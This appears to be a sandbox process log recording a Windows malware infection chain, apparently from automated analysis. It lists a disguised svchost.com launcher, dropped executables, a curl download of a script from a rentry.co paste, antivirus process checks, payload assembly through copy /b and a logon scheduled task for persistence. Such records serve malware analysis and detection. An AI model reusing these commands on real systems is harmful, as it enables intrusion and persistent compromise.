"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\287511317.exe

C:\Users\Admin\AppData\Local\Temp\287511317.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\154057176.exe

C:\Users\Admin\AppData\Local\Temp\154057176.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\test11.exe"

C:\Users\Admin\AppData\Local\Temp\Files\test11.exe

C:\Users\Admin\AppData\Local\Temp\Files\test11.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"

C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe

C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"

C:\Users\Admin\AppData\Local\Temp\Files\loader.exe

C:\Users\Admin\AppData\Local\Temp\Files\loader.exe

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "payload.bat"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_PointingDevice get PNPDeviceID /value | find "PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_PointingDevice get PNPDeviceID /value

C:\Windows\system32\find.exe

find "PNPDeviceID"

C:\Windows\system32\curl.exe

curl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silent

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\520429473.exe

C:\Users\Admin\AppData\Local\Temp\520429473.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE"

C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\ADAPTO~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /k copy Emotions Emotions.cmd & Emotions.cmd & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /k copy Emotions Emotions.cmd & Emotions.cmd & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3980 -ip 3980

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 332

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe

python-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe

"C:\Windows\Temp\{BE268F89-70B6-4786-963D-0EEA19ACEECA}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe" -burn.filehandle.attached=572 -burn.filehandle.self=724 /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe

"C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{DD8DBF4A-4DF9-4D20-A26B-E7B742651D29} {5C8DA92E-CA20-43A2-9F21-ED3F3CF16F12} 3244

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\system32\curl.exe

curl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c md 369580

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\findstr.exe

findstr /V "MaskBathroomsCompoundInjection" Participants

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\Z

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\369580\Origin.pif

369580\Origin.pif 369580\Z

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\timeout.exe

timeout 15

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\Admin\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\System.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\Files\System.exe

C:\Users\Admin\AppData\Local\Temp\Files\System.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"

C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe

C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe

"C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

